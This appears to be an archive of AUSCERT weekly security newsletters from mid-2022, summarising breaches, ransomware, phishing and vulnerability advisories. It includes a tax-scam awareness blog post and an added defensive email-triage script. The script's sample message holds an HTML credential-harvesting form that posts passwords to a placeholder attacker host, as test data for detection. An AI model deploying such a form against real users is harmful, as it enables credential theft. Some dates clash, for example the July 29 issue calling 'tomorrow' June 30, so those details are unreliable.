Students at top universities in Australia, the US and UK at risk of fraud
Date: 2022-08-02 Author: Cyber Security Connect
Proofpoint’s new research has found that the top universities in Australia, the United States and the United Kingdom are lagging on basic cyber security measures, subjecting students, staff and stakeholders to higher risks of email-based impersonation attacks. According to Proofpoint’s analysis, universities in the United States are most at risk with the poorest levels of protection, followed by the United Kingdom, then Australia.

Australia charges dev of Imminent Monitor RAT used by domestic abusers
Date: 2022-07-31 Author: Bleeping Computer
An Australian man was charged for developing and selling the Imminent Monitor remote access trojan, used to spy on victims’ devices remotely. A remote access trojan is a type of malware that allows full remote access to an infected device, including the ability to execute commands, log keystrokes, steal files and data, install additional software, take screenshots, and even record video from the device’s webcam. These types of malware are very popular among hackers due to their cheap price and the unfettered access they provide to infected devices. However, they are also popular with domestic abusers who use them to spy on their victims.

Decentralized IPFS networks forming the ‘hotbed of phishing’
Date: 2022-07-29 Author: The Register
Threat groups are increasingly turning to InterPlanetary File System (IPFS) peer-to-peer data sites to host their phishing attacks because the decentralized nature of the sharing system means malicious content is more effective and easier to hide. Threat analysts with cybersecurity vendor Trustwave this week said the InterPlanetary File System (IPFS) is becoming the “new hotbed of phishing” after seeing an increase in the number of phishing emails that contain IPFS URLs. At the same time, Atif Mushtaq, founder and chief product officer at anti-phishing company SlashNext, told The Register that his company is detecting phishing hosted on ipfs.io, cloudflare-ipfs.com and other vendor systems.

LockBit Ransomware Abuses Windows Defender for Payload Loading
Date: 2022-08-01 Author: Security Week
A LockBit ransomware operator or affiliate has been abusing Windows Defender to decrypt and load Cobalt Strike payloads during attacks, according to endpoint security firm SentinelOne. In April, SentinelOne reported that, in an attack involving LockBit ransomware, threat actors had leveraged a legitimate VMware command-line utility named ‘VMwareXferlogs.exe’ to side-load a Cobalt Strike payload. In a different attack observed by the cybersecurity firm, the attacker leveraged a command-line tool associated with Windows Defender. Specifically, the hackers used ‘MpCmdRun.exe’ to decrypt and load post-exploitation Cobalt Strike payloads.

ESB-2022.3764 – ALERT VMware products: CVSS (Max): 9.8
VMware has released patches to address multiple vulnerabilities in affected VMware products.

ESB-2022.3793 – OpenJDK 17.0.4: CVSS (Max): 7.5
The Red Hat build of OpenJDK is now available for portable Linux, fixing several vulnerabilities.

ESB-2022.3837 – Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers: CVSS (Max): 9.8
Cisco has released software updates to address several vulnerabilities affecting Small Business RV Series routers.

ESB-2022.3876 – BIG-IP (all modules): CVSS (Max): 8.7
A bypass restriction vulnerability with a CVSS of 8.7 has been fixed on BIG-IP.

Stay safe, stay patched and have a good weekend!
The AUSCERT team


Week in review

AUSCERT Week in Review for 29th July 2022

Greetings,

Great ideas were delivered with enthusiasm and with a hint of competitiveness at the AUSCERT Team Planning and Strategy Day earlier this week. It was a great opportunity for the teams to collaborate, brainstorm and put forward ideas and projects that focus on improving internal efficiencies and delivering the best service possible to our members. Now, it’s up to all of us to turn the ideas into reality, so watch this space!

An idea that wasn’t popular was the controversial use of facial recognition technology in Bunnings and Kmart stores, which was ‘paused’ earlier in the week following a significant public backlash. Positioned as a means of preventing theft, the stores are insistent that the use of such technology is legitimate. However, as reported in a recent Choice article, whether facial recognition technology may be used in this manner will be a matter for the Office of the Australian Information Commissioner (OAIC) to decide.

Tomorrow, June 30, is World Friendship Day. Originally developed by Hallmark as a means of creating another holiday in which to exchange cards, the concept of honouring friendship soon took over and it became a popular custom to reserve a day to celebrate friends. With the growth in social media across the globe, the General Assembly of the United Nations declared in 2011 that June 30 shall be a day to celebrate, connect and bring together people from all backgrounds.

Atlassian Patches Servlet Filter Vulnerabilities Impacting Multiple Products
Date: 2022-07-21 Author: Security Week
[See also: ESB-2022.3575]

Servlet Filters are pieces of Java code designed to intercept and process HTTP requests sent between a client and a backend. Servlet Filters may offer security mechanisms such as auditing, authentication, logging, or authorization. Tracked as CVE-2022-26136 and described as a Servlet Filter bypass, the first of the flaws could allow a remote, unauthenticated attacker to send a specially crafted HTTP request and authenticate to third-party apps, or to launch a cross-site scripting (XSS) attack to execute JavaScript code in a user’s browser.

Microsoft issues emergency fix for broken Windows 11 start menu
Date: 2022-07-25 Author: Bleeping Computer

Microsoft has addressed a known issue that was causing the start menu on some Windows 11 devices to malfunction after installing recent updates. This known issue affects only devices running Windows 11, version 21H2, and it was acknowledged on Friday after Redmond received customer reports of start menu issues affecting some systems. “A small number of devices are unable to open the Start menu after installing updates released June 23, 2022 or later,” the company explained in a recent update on the Windows health dashboard.

Hackers scan for vulnerabilities within 15 minutes of disclosure
Date: 2022-07-26 Author: Bleeping Computer

System administrators have even less time to patch disclosed security vulnerabilities than previously thought, as a new report shows threat actors scanning for vulnerable endpoints within 15 minutes of a new CVE being publicly disclosed. According to Palo Alto’s 2022 Unit 42 Incident Response Report, hackers are constantly monitoring software vendor bulletin boards for new vulnerability announcements they can leverage for initial access to a corporate network or to perform remote code execution. However, the speed at which threat actors begin scanning for vulnerabilities puts system administrators in the crosshairs as they race to patch the bugs before they are exploited.

Multiple Windows, Adobe Zero-Days Anchor Knotweed Commercial Spyware
Date: 2022-07-28 Author: Dark Reading

A cyber-weapons broker dubbed Knotweed has been outed, with Microsoft flagging it as being behind numerous spyware attacks on law firms, banks, and strategic consultancies in countries around the world. To boot, Knotweed has made a habit of incorporating rafts of Windows and Adobe zero-day exploits into its spyware since at least 2021, according to Microsoft.

Hacker puts 5.4m Twitter account details on sale with $30k price tag
Date: 2022-07-26 Author: Cyber Security Connect

A hacker has put a database of phone numbers and email addresses belonging to 5.4 million Twitter accounts for sale on the dark web for $30,000. Twitter is currently investigating the breach, according to reports by CyberWire. The hack is linked with a cyber breach that occurred in January this year, according to Restore Privacy, after tracking down HackerOne reports that observed the January incident “had potential of exposing user information even when hidden behind privacy settings”. Restore Privacy has also found that Twitter paid a bug bounty to the researcher who had reported the breach, which then enabled the short-form social media platform to close it, but that earlier vulnerability appears to have been “exploited to collect a very large tranche of user data”.

Ransomware Continues to Disrupt OT Operations
Date: 2022-07-28 Author: Cyber Security Connect

At the end of 2021, Dragos assessed with high confidence that ransomware would continue to disrupt OT operations into 2022. So far, that assessment holds true. Although we don’t have substantive evidence that the quantity of ransomware incidents has increased year on year, a surge of ransomware initial access campaigns in 2022 shows specific ransomware groups like Conti are more active. Also, the political tension between Russia and western countries may only exacerbate this.

Bunnings and Kmart halt use of facial recognition technology in stores as privacy watchdog investigates
Date: 2022-07-25 Author: The Guardian

Kmart and Bunnings have paused the use of facial recognition technology in their stores, amid an investigation from Australia’s privacy regulator. Consumer group Choice last month revealed Bunnings and Kmart were using the technology – which captures images of people’s faces from video cameras as a unique faceprint that is then stored and can be compared with other faceprints – in what the companies say is a move to protect customers and staff and reduce theft in select stores. The two companies are now being investigated by the Office of the Australian Information Commissioner (OAIC) over their use of the technology and whether it is consistent with privacy laws.

Microsoft Edge now improves performance by compressing disk cache
Date: 2022-07-27 Author: Bleeping Computer

Microsoft says Microsoft Edge users will notice improved performance and a smaller disk footprint because the web browser now automatically compresses disk caches. “Beginning with Microsoft Edge 102 on Windows, Microsoft Edge automatically compresses disk caches on devices that meet eligibility checks, to ensure the compression will be beneficial without degrading performance,” the Microsoft Edge Team said Wednesday. “This ensures compression of these caches largely improves performance and overall user experience.”

ESB-2022.3656 – Firefox: CVSS (Max): None
Mozilla has updated Firefox to version 103 to patch multiple vulnerabilities

ESB-2022.3576 – Google Chrome: CVSS (Max): None
Multiple vulnerabilities have been fixed in Google Chrome version 103.0.5060.134

ESB-2022.3706 – Samba: CVSS (Max): 8.8
Samba has addressed a security vulnerability that allows Samba AD users to forge password change requests for any user, including Admin

ESB-2022.3685 – Red Hat OpenShift Service Mesh 2.1.3: CVSS (Max): 10.0
Red Hat has released a critical security update for Red Hat OpenShift Service Mesh addressing a trivial bypass vulnerability

ASB-2022.0175.2 – SonicWall GMS (Global Management System) and Analytics On-Prem products: CVSS (Max): None
SonicWall has released security advisories about an SQL injection vulnerability affecting GMS (Global Management System) and Analytics On-Prem products

Stay safe, stay patched and have a good weekend!
The AUSCERT team


Week in review

AUSCERT Week in Review for 22nd July 2022

Greetings,

Yesterday saw the majority of Australia and New Zealand Microsoft users impacted by the Microsoft Teams outage, AUSCERT included. It is being reported that the outage was caused by "a recent deployment [that] contained a broken connection to an internal storage service". We hope this gave users the chance to celebrate National Lamington Day. The humble lamington has been a part of the Australian tradition since the 1800s. Yet, the lamington is another dessert that has its origins disputed, much like the pavlova.

Car hacking is not just for the movies anymore, but came closer to reality this week with the discovery of the unpatched bug in the MiCODUS GPS device. The vulnerability can allow attackers to restrict fuel intake, monitor the location of vehicles and even stop the vehicles. Currently, there is no patch that can be applied to mitigate this bug.

…

Cisco Patches Severe Vulnerabilities in Nexus Dashboard
Date: 2022-07-21 Author: Security Week
[ESB-2022.3545]

Cisco on Wednesday announced the availability of patches for multiple vulnerabilities in Nexus Dashboard, including a critical-severity issue that could lead to the execution of arbitrary commands. The Nexus Dashboard is a data center management console that provides administrators and operators with quick access to required resources across services and applications. The most severe of the newly resolved vulnerabilities affecting the console is CVE-2022-20857 (CVSS score of 9.8), which could allow a remote, unauthenticated attacker to access a specific API and execute arbitrary commands.

Hacker Abusing Windows NFS Remote Code Execution Flaw
Date: 2022-07-20 Author: Cyware

The vulnerability, tracked as CVE-2022-30136, was patched in June; however, the report provided more detailed information about potential exploitation. The flaw is contained within Windows NFS and occurs due to improper handling of NFSv4 requests. It could be abused by sending malicious RPC calls to a target server. Further, successful exploitation could result in arbitrary code execution as SYSTEM. On the other hand, unsuccessful exploitation could even crash the system.

Microsoft Teams outage widens to take out M365 services, admin center
Date: 2022-07-21 Author: The Register

Microsoft acknowledged the issue at 01:47 UTC on July 21 and offered the following update around 75 minutes later. The outage appears to be global, but Microsoft is perhaps a little fortunate that the incident struck when the working day was all but over in the US, and in the dark of the European night. Most of the reaction The Register can find is therefore from the Asia-Pacific region, where businesses such as an Australian horse-racing organization have been disrupted.

LDAP Account Manager bug poses unauthenticated remote code execution risk
Date: 2022-07-19 Author: Portswigger

An unauthenticated arbitrary object instantiation vulnerability in LDAP Account Manager (LAM) has been discovered during an internal penetration test. LAM is a PHP web application for managing entries such as users, groups, or DHCP settings in LDAP directories via a web frontend, and is one of the alternatives to FreeIPA. It’s included in Debian repositories. But a vulnerability discovered by researcher Arseniy Sharoglazov could allow an attacker to create arbitrary objects and achieve remote code execution (RCE) in one request, and without any out-of-band connections.

Critical flaws in GPS tracker enable “disastrous” and “life-threatening” hacks
Date: 2022-07-20 Author: Ars Technica

A security firm and the US government are advising the public to immediately stop using a popular GPS tracking device or to at least minimize exposure to it, citing a host of vulnerabilities that make it possible for hackers to remotely disable cars while they’re moving, track location histories, disarm alarms, and cut off fuel.

Log4j vulnerabilities remain 'endemic', says US DHS
Date: 2022-07-18 Author: iTnews

The US Department of Homeland Security has warned that the world is likely to be dealing with the fallout from the Log4j vulnerability for a decade or more. Log4j – also known as Log4shell – is a critical vulnerability in a Java logging library that can be used for remote code execution and to gain full control over millions of vulnerable enterprise systems.

COVID-19 lockdowns see rise in bank and credit-card fraud as more people work and shop from home
Date: 2022-07-18 Author: ABC News

One in nine Australians have been victims of personal fraud, with card fraud the most common type due to more people banking and shopping online because of COVID-19. Card fraud is when criminals get hold of your banking or credit-card details to illegally access your account and steal money. The Australian Bureau of Statistics said 11 per cent of Australians, or more than 2 million people, were victims of personal fraud in 2020-21, compared to 8.5 per cent in 2014-15.

Westpac arms itself for cryptocurrency tilt – Finance – Software
Date: 2022-07-20 Author: IT News

Westpac has given a clear indication of its intent to enter the cryptocurrency and blockchain space, having previously been tight-lipped as to its ambitions. The bank posted an open call for a principal architect for digital assets and cryptocurrency in recent weeks, from which it is clear that Westpac wants to set itself up as a leader in what it is collectively calling “digital assets”.

ESB-2022.3563 – Apple Watch Series 3: CVSS (Max): 5.5*
Apple released security updates to fix vulnerabilities impacting Apple Watch. Users should upgrade their devices by installing watchOS 8.7.

ESB-2022.3559 – macOS Monterey 12.5: CVSS (Max): 7.5*
Apple addressed several arbitrary code execution flaws impacting Neural Engine, GPU Drivers, ImageIO, ICU, and Kernel. Users should upgrade their devices by installing macOS Monterey 12.5

ESB-2022.3553 – Safari 15.6: CVSS (Max): None
Apple fixed an arbitrary code execution issue with the release of Safari 15.6: an out-of-bounds write issue was addressed with improved input validation. Safari 15.6 may be obtained from the Mac App Store

ESB-2022.3522 – MiCODUS MV720 GPS tracker: CVSS (Max): 9.8
Exploitation of several vulnerabilities could allow an attacker control over any MV720 GPS tracker, granting access to location, routes, fuel cutoff commands, and the disarming of various features (e.g., alarms). MiCODUS has not provided updates or patches to mitigate these vulnerabilities.

ESB-2022.3574 – Questions For Confluence: CVSS (Max): None
An external party has discovered and publicly disclosed a hardcoded password for Questions for Confluence on Twitter. This issue is likely to be exploited in the wild now that the hardcoded password is publicly known. This vulnerability should be remediated on affected systems immediately.

Stay safe, stay patched and have a good weekend!
The AUSCERT team


Week in review

AUSCERT Week in Review for 15th July 2022

Greetings,

Last week in our blog, Staying aware this tax time, we looked at potential risks for individuals in relation to phishing and smishing, specific to Australian tax processes. A recent article from The Conversation expands upon this growing trend, providing examples of methods used by scammers to gain an insight into the lives of potential targets, with their age and social status key data. It goes on to explain that information from social media is making it easier for scammers to create phishing attacks specifically targeting people, due to the abundance of personal information available about them.

Increasing global connectivity and our growing reliance on technology are factors that have fuelled the growth of IT/OT convergence. This area is a perpetual work in progress and is discussed in the first episode of Season 2 of our podcast series. Episode 13 features a chat between Anthony Caruana and Lesley Carhart, who discuss the intersection between cyber security and operational technology, including the increased risk and vulnerability throughout the industry.

Microsoft's July Patch Tuesday fixes actively exploited bug
Date: 2022-07-12 Author: The Register
[See also: ASB-2022.0137]

No, Windows Autopatch didn't kill the monthly patchapalooza

PATCH TUESDAY Despite worries that Patch Tuesday may not be as exciting now that Microsoft's Windows Autopatch is live — with a slew of caveats — the second Tuesday of this month arrived with 84 security fixes, including 4 critical bugs and one that's under active exploit. Let's start with the one that miscreants have already found and exploited. CVE-2022-22047 is an elevation of privilege vuln in Windows' Client Server Runtime Subsystem (CSRSS). Microsoft deemed it an "important" security issue, with low complexity and low privileges required to exploit. "An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," the security advisory explained.

Ransomware gang now lets you search their stolen data
Date: 2022-07-11 Author: Bleeping Computer

Two ransomware gangs and a data extortion group have adopted a new strategy to force victim companies to pay threat actors to not leak stolen data. The new tactic consists of adding a search function on the leak site to make it easier to find victims or even specific details. At least two ransomware operations and a data extortion gang have adopted the strategy recently and more threat actors are likely to do the same.

Deakin University reveals breach of 47,000 students' details
Date: 2022-07-13 Author: iTnews

Subset targeted with smish sent via officially-used SMS channel.

Deakin University has revealed a data breach impacting almost 47,000 current and past students, along with a ‘smishing’ attempt that compromised a legitimate communications channel to target 10,000 current students. The Victorian university said it had been “targeted in a cyber attack” where a single staff member’s login credentials were compromised.

Microsoft details massive phishing operation
Date: 2022-07-13 Author: IT News

A phishing campaign that has been active since September 2021 has so far attempted to target more than 10,000 organisations, Microsoft security researchers said. The campaign uses what Microsoft calls Adversary in the Middle (AitM) attacks, which involve setting up a proxy server that sits between victims and the websites they wish to visit. With a proxy server that intercepts hyper text transfer protocol (HTTP) packets from users, attackers don't need to create sites that impersonate legitimate ones, as per traditional phishing campaigns.

Australia's major banks look to dynamic CVV to combat payment fraud
Date: 2022-07-11 Author: IT News

Three of the 'Big Four' Australian banks have turned to dynamic card verification value (CVV) functionality to combat online payment fraud and boost digital consumer protections. The CVC or CVV is traditionally a static, three-digit number found on the back of a physical debit or credit card that acts as an additional layer of verification or security when a customer is transacting online.

Vulnerability Spotlight: Adobe Acrobat DC use-after-free issues could lead to arbitrary code execution
Date: 2022-07-13 Author: Talos Website
[See also ESB-2022.3409]

Cisco Talos recently discovered two use-after-free vulnerabilities in Adobe Acrobat Reader DC that could allow an attacker to eventually gain the ability to execute arbitrary code. Acrobat is one of the most popular PDF reader software options available currently. It includes the ability to read and process JavaScript to give PDFs greater interactivity and customization options for users. This vulnerability exists in the way Acrobat Reader processes JavaScript.

1 in 3 untrained employees will click on a phishing link
Date: 2022-07-13 Author: Security Brief

One in three untrained employees will click on a phishing link, according to a new report from KnowBe4. The security awareness training and simulated phishing platform has released the new 2022 Phishing by Industry Benchmarking Report, which measures an organisation’s Phish-proneTM Percentage (PPP), which indicates how many of their employees are likely to fall for phishing or a social engineering scam.

Tech giants want to kill off passwords. Here's why they think passkeys will change the world, and what that means for you
Date: 2022-07-14 Author: ABC News

Last year, a password management company and a group of researchers found that the most common password in the world was 123456 — they said it showed up more than 103 million times. Second was 123456789. Third was 12345

ASB-2022.0139 – ALERT Windows 7 and Windows Server 2008: CVSS (Max): 8.8*
Microsoft's Patch Tuesday included fixes for Windows 7 and Windows Server 2008

ASB-2022.0137 – ALERT Windows: CVSS (Max): 8.8*
Microsoft Patch Tuesday updates included a fix for the CVE-2022-22047 actively exploited vulnerability

ESB-2022.3409 – Adobe Acrobat DC and Adobe Acrobat Reader DC: CVSS (Max): 7.8
Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS which address multiple critical and important vulnerabilities that could lead to arbitrary code execution and memory leak

ESB-2022.3381 – CVSS (Max): 9.8
An update was released for two security issues in the Debian PHP package which could result in a denial of service or potentially the execution of arbitrary code

Stay safe, stay patched and have a good weekend!
The AUSCERT team


Week in review

AUSCERT Week In Review for July 8th 2022

Greetings,

The second half of 2022 has commenced with a mix of chilly temperatures and wet weather for most of Australia and news that a third wave of the COVID pandemic is increasingly likely. Not wanting to add to the woes of many, we at AUSCERT felt it prudent to share our insights into another potential threat: tax-related scams. In our recent blog, Stay alert this tax time, we highlight two of the more widely used tactics, phishing and smishing. By providing examples and what to look out for, we hope to increase awareness and reduce the success of would-be attackers.

Perhaps the Shanghai Police could have been more vigilant in this regard, with reports stating that the recent attack, which resulted in the data of almost one billion people being leaked, was the result of poor security. It is alleged that the system wasn’t hacked but rather that it simply didn’t have a password for over a year. CNN delves into this situation, providing insights into what currently appears to be the largest leak of public information seen.

Closer to home, NAIDOC Week 2022 continues. Its theme, ‘Get up! Stand up! Show up!’, encourages us all to acknowledge and celebrate the histories, cultures, and achievements of Aboriginal and Torres Strait Islander people. It is an important annual event where everyone’s invited to join in the celebrations, with official celebrations held from July 3-10. Visit the NAIDOC website for news, stories, and information on how you can show your support and help bridge the gap.

Verified Twitter accounts hacked to send fake suspension notices
Date: 2022-07-02 Author: Bleeping Computer

Threat actors are hacking verified Twitter accounts to send fake but well-written suspension messages that attempt to steal other verified users’ credentials. Twitter verifies accounts if they are considered notable influencers, celebrities, politicians, journalists, activists, and government and private organizations. To receive the verified ‘blue badge,’ Twitter users must apply for verification and submit supporting documentation to show why their account is ‘notable.’

Australia offers cyber-security assistance to Ukraine
Date: 2022-07-04 Author: Cyber Security Connect

Strengthening the cyber resilience of Ukraine’s Border Guard Service forms part of a new assistance package from the Australian government. In response to a request from President Volodymyr Zelenskyy, the Commonwealth government has committed $99.5 million in additional military assistance to Ukraine, including the delivery of 14 M113 armoured personnel carriers and 20 Thales-built Bushmaster protected mobility vehicles. The value of Australia’s military assistance to Ukraine now totals approximately $388 million. Notably, $8.7 million has been pledged to assist Ukraine’s Border Guard Service, tipped to fund upgrades to border management equipment, improvements to cyber security, and enhancements to border operations in the field.

Australian businesses lose $227 million to BEC-like scams
Date: 2022-07-04 Author: ITnews

Australian businesses were scammed out of $227 million in “payment redirection” cons – which include business email compromise or BEC – over the course of 2021. Payment redirection, as the ACCC groups these scams, caused the highest losses to businesses out of any scam type, according to the commission’s latest scam report.

Facebook 2FA phish arrives just 28 minutes after scam domain created
Date: 2022-07-01 Author: Naked Security

We’ll tell this story primarily through the medium of images, because a picture is worth 1024 words. This cybercrime is a visual reminder of three things:
It’s easy to fall for a phishing scam if you’re in a hurry.
Cybercriminals don’t waste any time getting new scams going.
2FA isn’t a cybersecurity panacea, so you still need your wits about you.

Google patches new Chrome zero-day flaw exploited in attacks
Date: 2022-07-04 Author: Bleeping Computer
[See also ESB-2022.3254]

Google has released Chrome 103.0.5060.114 for Windows users to address a high-severity zero-day vulnerability exploited by attackers in the wild, the fourth Chrome zero-day patched in 2022. “Google is aware that an exploit for CVE-2022-2294 exists in the wild,” the browser vendor explained in a security advisory published on Monday.

Poor patching creates easy zero-day vulnerability reuse
Date: 2022-07-01 Author: iTnews

Google’s elite Project Zero security researchers are again warning that insufficient patching of vulnerabilities means threat actors can vary their methodologies and reuse software bugs. Project Zero’s Maddie Stone posted a half-year report on the zero-day vulnerabilities that are being exploited with no patches available for 2022.

Fortinet patch batch remedies multiple path traversal vulnerabilities | The Daily Swig
Date: 2022-07-07 Author: Port Swigger

Fortinet has addressed a raft of security vulnerabilities affecting several of its endpoint security products. The California-headquartered cybersecurity giant, which accounts for more than a third of all firewall and unified threat management shipments worldwide, released a huge number of firmware and software updates on Tuesday (July 5).

Cloud Misconfig Exposes 3TB of Sensitive Airport Data in Amazon S3 Bucket: ‘Lives at Stake’
Date: 2022-07-07 Author: Dark Reading

A misconfigured Amazon S3 bucket resulted in 3TB of airport data (more than 1.5 million files) being publicly accessible, open, and without an authentication requirement for access, highlighting the dangers of unsecured cloud infrastructure within the travel sector. The exposed information, uncovered by Skyhigh Security, includes employee personal identification information (PII) and other sensitive company data affecting at least four airports in Colombia and Peru.

ESB-2022.3250 – GitLab Community Edition (CE) and Enterprise Edition (EE): CVSS (Max): 9.9
GitLab released a critical security update in versions 15.1.1, 15.0.4, and 14.10.5 for GitLab Community Edition (CE) and Enterprise Edition (EE)

ESB-2022.3315 – MozillaFirefox: CVSS (Max): 7.5
Mozilla has released a Firefox update that fixes 9 new vulnerabilities

ESB-2022.3331 – PHP: CVSS (Max): 9.8
USN-5479-1 fixed vulnerabilities in PHP. Unfortunately that update for CVE-2022-31625 was incomplete for Ubuntu 18.04 LTS. This update fixes the problem

ESB-2022.3325 – Traffix SDC: CVSS (Max): 8.6
A remote attacker may be able to exploit this vulnerability to compromise the data confidentiality, integrity, and availability of the affected system

Stay safe, stay patched and have a good weekend!
The AUSCERT team


Blogs

Staying aware this tax time

As one financial year ends and another begins, Australians start preparing their tax returns and, with that, an increase in the frequency and scope of tax-related phishing is expected. We are going to look at various methods a scammer/attacker might use to obtain your personal information, such as username, password, credit card details, contact details or any other information that identifies you as you. This personal information is then used fraudulently or to conduct further malicious activities, depending on the data obtained.

Email phishing

Email phishing is one of the most common methods used to obtain your personal information. The sender imitates the Australian Tax Office (ATO) or MyGov and sends a phishing email that looks like a legitimate email. The spoofed sender address may be difficult to detect when the recipient is using a phone as, typically, the phone does not show the full email address revealing who it was actually sent from.

a. Email with a phishing URL

Usually, such emails contain a phishing link that, when clicked, redirects the user to a website asking for personal information. Emails that request the recipient to enter their details, such as bank account information, could lead to fraud.

Example of malicious email with a phishing URL

b. Email with a local HTML attachment

Some emails will not contain any phishing URLs within the body of the email. Instead, the email will have an HTML file as an attachment. When a user opens the HTML attachment, it will display a phishing form requesting the user enter a username and password. The HTML file contains code that sends the credentials to the attacker (if entered). Such techniques are used to avoid email security software.

Example of malicious email with an HTML attachment
Example of malicious email with an HTML phishing form

Smishing (SMS phishing)

As consumers become more aware of potential threats and scams, attackers develop new methods to target and trick recipients. One such method is smishing. This method is quite simple, as the fake texts are disguised to appear to come from a known and trusted source such as a bank or the ATO. In this instance, a text message with a URL is sent to a phone number, pretending to be from MyGov. When clicked, the user is redirected to a MyGov phishing page where they are required to enter personal information. Additionally, it could then redirect the user to a secondary phishing page made to look like a bank.

Example of malicious phishing link in SMS/Text Message (1)
Example of malicious phishing link in SMS/Text Message (2)
Example of phishing page (MyGov)
Example of phishing page redirecting to secondary phishing page (MyGov to a bank)

It is important to know that the ATO or MyGov would not send any email or text message directly to ask for any personal information. Should you receive a suspicious email or SMS, please report it to ReportEmailFraud@ato.gov.au or contact the ATO. If something looks suspicious, be it the spelling, the website address or the request within the message, do not click the link or proceed!

The ATO is a member of AUSCERT and we help the ATO in deactivating such phishing websites. AUSCERT members have access to the Malicious URL Feed, which is automatically populated with malware and phishing links as AUSCERT’s Analyst Team processes them and is updated every 15 minutes. Additional indicators (over and above the malicious URLs), such as email content and phish page screen captures, can be found in AUSCERT’s Member Security Incident Notifications (MISP). Further information on the mentioned services can be found at the links below:

AUSCERT Malicious URL Feed
AUSCERT MISP
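As an added illustration (not part of the original AUSCERT blog post, and not AUSCERT's own tooling), the following Python script shows how mail-gateway or analyst triage code can pick up both email patterns described above: a phishing URL in the message body, checked against a blocklist that stands in for a feed such as the Malicious URL Feed, and an HTML attachment whose form posts a password field to a remote host. The two sample messages, the domains in them and the blocklist are constructed placeholders; only Python's standard library is used.

```python
"""Triage helper for the two email phishing patterns described above.

Constructed example: the messages, domains and blocklist below are
placeholders invented for this illustration, not real indicators.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s<>"']+""")

# Stand-in for a malicious URL feed (constructed, not a real feed entry).
BLOCKLIST = {"mygov-refund.example"}

# Pattern (a): a body link that leads to a credential-harvesting page.
SAMPLE_URL_PHISH = """From: myGov <noreply@mygov-notice.example>
To: taxpayer@example.com
Subject: Your refund is waiting
Content-Type: text/plain; charset="utf-8"

Claim your refund at https://mygov-refund.example/login before Friday.
"""

# Pattern (b): no link in the body; an HTML attachment carries the form.
SAMPLE_HTML_ATTACHMENT = """From: ATO Refunds <refunds@ato-notice.example>
To: taxpayer@example.com
Subject: Refund form attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset="utf-8"

Please open the attached form to claim your refund.

--XYZ
Content-Type: text/html; name="refund-form.html"
Content-Disposition: attachment; filename="refund-form.html"

<html><body>
<form method="POST" action="https://collector.attacker.example/submit">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Claim refund">
</form>
</body></html>
--XYZ--
"""


class FormScanner(HTMLParser):
    """Record every <form> in an HTML document: its action URL and whether
    it contains a password input (the credential-harvesting signature)."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password_field": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_message(raw, blocklist):
    """Return body URLs, forms found in HTML attachments, and the reasons
    (if any) the message should be treated as suspicious."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = {"body_urls": [], "credential_forms": [], "reasons": []}

    # Pattern (a): URLs in the readable body, checked against the blocklist.
    body = msg.get_body(preferencelist=("plain", "html"))
    if body is not None:
        findings["body_urls"] = URL_RE.findall(body.get_content())
    for url in findings["body_urls"]:
        host = urlparse(url).hostname or ""
        if host in blocklist:
            findings["reasons"].append(f"body link to listed host {host}")

    # Pattern (b): HTML attachments whose forms post a password to any host.
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        for form in scanner.forms:
            host = urlparse(form["action"]).hostname or ""
            findings["credential_forms"].append(
                {"attachment": part.get_filename(), "action": form["action"],
                 "host": host, "password_field": form["password_field"]})
            if form["password_field"] and host:
                findings["reasons"].append(
                    f"HTML attachment {part.get_filename()} posts a password to {host}")

    findings["suspicious"] = bool(findings["reasons"])
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_URL_PHISH, SAMPLE_HTML_ATTACHMENT):
        print(analyze_message(sample, BLOCKLIST)["reasons"])
```

The HTML-attachment check deliberately does not depend on the blocklist: a freshly registered collector domain will not be on any feed yet, so the presence of a password form inside an attached file is treated as a signal in its own right, which matches the reason the blog gives for attackers using attachments in the first place.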


Week in review

AUSCERT Week In Review for July 1st 2022

Greetings, Today sees us enter the second half of 2022 which, for many of us, seems to have arrived sooner than expected. Something else that has landed quickly is the second season of our podcast series, ‘Share Today, Save Tomorrow’. The first episode of the season features the amazing Lesley Carhart, known to many by her Twitter handle @hacks4Pancakes. Lesley, an industry leader in incident response, chats to Anthony Caruana about the intersection between cyber security and operational technology, including the increased risk and vulnerability throughout the industry. There’s more from our very own Bek and Mike in the episode so be sure to take the time to listen to Episode 13 – ITOT Convergence. Mike and Bek look back at some of their highlights from this year’s conference, AUSCERT2022, which is made a little easier with the recorded sessions from this year’s conference now available! Emails were sent to attendees with the login details so be sure to check your inbox. The OnAir portal will remain open until Friday, 29th July 2022 which should allow plenty of time to revisit your own highlights or, perhaps watch a session that you may have missed. Excitingly, the merchandise from this year’s conference has also been shipped to attendees! As most of us have experienced, shipment times are a tad longer nowadays so, please be patient. We assure you, the wait will be worth it! Lastly, some would say most importantly, next Thursday, July 7, 2022, is World Chocolate Day. From their discovery and use by the Olmecs over 2,500 years ago, cacao beans have been used as currency, turned into a bitter drink and of course, used to make the most popular tasty treat consumed the world over today. Chocolate contains antioxidants and can improve your cardiovascular health and can be enjoyed in seemingly endless ways. So, please do your part and support World Chocolate Day with something made from, dipped in or containing some chocolate! 
New report finds 101% spike in email threats
Date: 2022-07-24
Author: Cyber Security Connect

Trend Micro reports that it blocked over 33.6 million cloud email threats in 2021, a 101 per cent increase on the previous year. Trend Micro’s research on the mounting number of cyber risks highlighted that 48 per cent of local organisations don’t believe their method of assessing risk exposure is sophisticated enough, underlining the vulnerability of Australia’s corporate sector to increasingly insidious email threats. Email remains a top point of entry for cyber attacks, as demonstrated by this massive increase. Many Australian businesses faced spear-phishing, business email compromise (BEC) and email-based ransomware attacks in 2021.

RansomHouse claims AMD hack, 450GB data stolen
Date: 2022-07-29
